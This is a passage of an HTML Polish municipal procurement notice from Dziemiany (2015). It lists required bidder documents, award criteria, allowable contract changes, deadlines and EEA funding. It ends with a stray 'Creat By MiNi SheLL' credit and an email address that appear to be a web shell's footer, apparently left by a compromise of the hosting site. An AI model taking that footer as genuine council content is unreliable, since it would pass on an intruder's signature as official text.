<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy 2. Pełnomocnictwo dla osoby podpisującej ofertę do występowania w imieniu Wykonawcy, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych lub w przypadku o którym mowa w art.
23 ust. 2 ustawy Prawo zamówień publicznych 3. Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (oryginał), wymagane w przypadku gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust.2b ustawy Prawo zamówień publicznych 4. Dowód wniesienia wadium 5. Jeżeli w kraju miejsca zamieszkania
osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o
których mowa w § 4 ust. 1 rozporządzenia, zastępuje się je dokumentem zawierającym oświadczenie, w którym
określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym,
administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca
zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed
notariuszem</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin wykonania - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z treścią art. 144 ust.1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian w umowie zawartej z Wykonawcą. 
Zmiany w umowie, na skutek wystąpienia poniższych okoliczności mogą dotyczyć następujących elementów umowy: 
1)	terminu wykonania zamówienia: 
a)	wystąpienie różnego rodzaju klęsk żywiołowych, epidemii, operacji wojennych, strajku generalnego, 
b)	ustalenie innych warunków płatności, 
c)	konieczność uzyskania przez Zamawiającego dodatkowych decyzji np. administracyjnych lub przedłuży się okres ich uzyskania, 
d)	zmiany terminu wykonania usługi w przypadku opóźnień wynikających z przedłużających się procedur administracyjnych niezależnych od Wykonawcy, 
e)	wniesienie uwag i protestów dotyczących uzyskania decyzji, 
f)	konieczność wykonania usług dodatkowych, uzupełniających lub zamiennych, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia,
g)	zmiany obowiązujących przepisów. 
2)	terminu płatności: 
a)	zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego, 
3)	parametry przedmiotu zamówienia i inne: 
a)	  zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego, 
b)	  aktualizacji rozwiązań technologicznych, 
c)	  zmiana kluczowego personelu,
d)	  zmniejszenie zakresu przedmiotu umowy, gdy jego wykonanie w pierwotnym zakresie nie leży w granicach uzasadnionego interesu Zamawiającego, 
e)	  powierzenia Podwykonawcy określonego zakresu usług nie wskazanych w ofercie jako planowany do powierzenia Podwykonawcom.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dziemiany.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Dziemianach
ul. 8-go Marca 3
83-425 Dziemiany
pokój nr 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2015 godzina 10:00, miejsce: Urząd Gminy w Dziemianach
ul. 8-go Marca 3
83-425 Dziemiany
pokój nr 14 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze zadanie realizowane jest w ramach projektu partnerskiego pn. Kościerskie Strefy Aktywności Gospodarczej - realizowany w ramach konkursu Ministerstwa Rozwoju Regionalnego (obecne MIiR) - Rozwój miast poprzez wzmocnienie kompetencji jednostek samorządu terytorialnego, dialog społeczny oraz współpracę z przedstawicielami społeczeństwa obywatelskiego współfinansowany ze środków Mechanizmu Finansowego EOG oraz środków krajowych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com